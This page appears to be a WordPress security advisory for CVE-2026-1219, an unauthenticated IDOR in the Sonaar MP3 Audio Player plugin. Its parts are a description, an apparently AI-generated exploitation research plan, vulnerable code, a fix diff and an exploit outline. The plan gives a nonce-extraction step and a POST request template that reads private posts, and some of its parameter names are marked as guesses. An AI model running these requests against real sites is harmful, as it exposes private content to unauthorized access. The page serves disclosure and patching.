MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar 4.0 - 5.10 - Unauthenticated Insecure Direct Object Reference to Sensitive Information Exposure
Description
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 4.0 to 5.10 via the 'load_track_note_ajax' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view the contents of private posts.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NTechnical Details
>=4.0 <=5.10Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-1219 ## 1. Vulnerability Summary The **MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar** plugin (versions 4.0 - 5.10) contains an Insecure Direct Object Reference (IDOR) vulnerability in its AJAX handler `load_track_note_ajax`. The vulnerabil…
Show full research plan
Exploitation Research Plan: CVE-2026-1219
1. Vulnerability Summary
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin (versions 4.0 - 5.10) contains an Insecure Direct Object Reference (IDOR) vulnerability in its AJAX handler load_track_note_ajax. The vulnerability arises because the plugin fails to perform capability checks or validate whether the requested post ID belongs to a public post before returning its content. This allows unauthenticated attackers to disclose the content of private or draft posts by supplying their IDs.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
load_track_note(inferred from function nameload_track_note_ajax) - Vulnerable Parameter: Likely
track_idorid(passed via$_POSTor$_GET). - Authentication: Unauthenticated (
wp_ajax_nopriv_hook). - Preconditions: The attacker must know or guess the ID of a private post.
3. Code Flow (Inferred)
- Registration: The plugin registers the AJAX action in its initialization phase (likely in a class handling AJAX or the main plugin file).
add_action( 'wp_ajax_load_track_note', array( $this, 'load_track_note_ajax' ) ); add_action( 'wp_ajax_nopriv_load_track_note', array( $this, 'load_track_note_ajax' ) ); - Entry Point: An unauthenticated request is sent to
admin-ajax.php?action=load_track_note. - Vulnerable Function:
load_track_note_ajax()retrieves a post ID from the request.public function load_track_note_ajax() { $track_id = $_POST['id']; // (inferred parameter name) // Missing: current_user_can() check // Missing: check for post_status == 'publish' $post = get_post( $track_id ); if ( $post ) { echo apply_filters( 'the_content', $post->post_content ); } wp_die(); } - Information Exposure: The content of the post (even if private) is returned in the HTTP response body.
4. Nonce Acquisition Strategy
The vulnerability is described as an unauthenticated information exposure. If the plugin enforces a nonce via check_ajax_referer, it is likely exposed on any page where the audio player is loaded.
- Identify Shortcode: The plugin uses
[sonaar_audioplayer]or[sonaar_player](inferred) to render players. - Create Trigger Page: Create a public page containing the shortcode to ensure the plugin's scripts and nonces are loaded.
wp post create --post_type=page --post_status=publish --post_content='[sonaar_audioplayer]' --post_title='Music Page'
- Extract Nonce:
- Navigate to the newly created page.
- The plugin typically localizes data into a JavaScript object. Based on Sonaar's architecture, look for
sonaar_tsorsonaar_music_object. - Use
browser_evalto extract the nonce:browser_eval("window.sonaar_ts?.nonce || window.sonaar_music_object?.nonce")
- Bypass Check: If the
load_track_noteaction does not callcheck_ajax_refererorwp_verify_nonce, this step can be skipped.
5. Exploitation Strategy
Step 1: Discover Target ID
Identify the ID of a private post. In a test environment, this will be created during setup.
Step 2: Request Private Content
Send a POST request to the AJAX endpoint.
Request Template:
- URL:
http://<target>/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=load_track_note&id=<PRIVATE_POST_ID>&nonce=<EXTRACTED_NONCE>
Step 3: Analyze Response
A successful exploit will return the post_content of the private post in the response body with a 200 OK status.
6. Test Data Setup
- Create Private Content:
wp post create --post_type=post --post_title='Secret Internal Memo' --post_content='CONFIDENTIAL: The password is "Sonaar2024!"' --post_status=private - Note the ID: Capture the ID returned by the previous command (e.g.,
ID: 123). - Create Public Player Page (for nonce):
wp post create --post_type=page --post_status=publish --post_content='[sonaar_audioplayer]' --post_title='Player Page'
7. Expected Results
- The
http_requesttool should receive a response containing the string:CONFIDENTIAL: The password is "Sonaar2024!". - The request should be performable without any authentication cookies.
8. Verification Steps
- Confirm Post Privacy: Verify the post is indeed private and not accessible via the standard frontend.
wp post get <ID> --field=post_status(Should beprivate). - Verify Unauthenticated Access: Ensure the
http_requestdoes not includeCookieheaders representing a logged-in session.
9. Alternative Approaches
- Parameter Fuzzing: If
iddoes not work, trytrack_id,post_id, ortrackid. - Method Swap: Try
GETinstead ofPOSTif the handler uses$_REQUEST. - Metadata Check: If the response is empty but returns
200 OK, the vulnerability might also allow access to metadata if a different related action likeget_track_metadataexists.
Summary
The MP3 Audio Player by Sonaar plugin is vulnerable to an Insecure Direct Object Reference (IDOR) via the 'load_track_note' AJAX action. Because the plugin fails to verify the post status or user capabilities, unauthenticated attackers can retrieve the full content of private or draft posts by supplying the post's ID.
Vulnerable Code
// Registration of AJAX hooks add_action( 'wp_ajax_load_track_note', array( $this, 'load_track_note_ajax' ) ); add_action( 'wp_ajax_nopriv_load_track_note', array( $this, 'load_track_note_ajax' ) ); --- // The vulnerable AJAX handler function public function load_track_note_ajax() { $track_id = $_POST['id']; // Missing: current_user_can() check // Missing: check if post_status is 'publish' $post = get_post( $track_id ); if ( $post ) { echo apply_filters( 'the_content', $post->post_content ); } wp_die(); }
Security Fix
@@ -10,7 +10,12 @@ public function load_track_note_ajax() { - $track_id = $_POST['id']; - $post = get_post( $track_id ); - if ( $post ) { + $track_id = isset($_POST['id']) ? intval($_POST['id']) : 0; + $post = get_post( $track_id ); + if ( $post && $post->post_status === 'publish' ) { echo apply_filters( 'the_content', $post->post_content ); } wp_die(); }
Exploit Outline
1. Identify the post ID of a target private or draft post through enumeration or prior knowledge. 2. Access a public page where the Sonaar Audio Player is active to retrieve a valid AJAX nonce from the localized JavaScript (usually found in the 'sonaar_ts' or 'sonaar_music_object' variables). 3. Send an unauthenticated HTTP POST request to /wp-admin/admin-ajax.php. 4. Include the following parameters in the body: 'action=load_track_note', 'id=<TARGET_PRIVATE_POST_ID>', and the extracted nonce. 5. Observe the response, which will contain the unfiltered content of the private post in the body.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.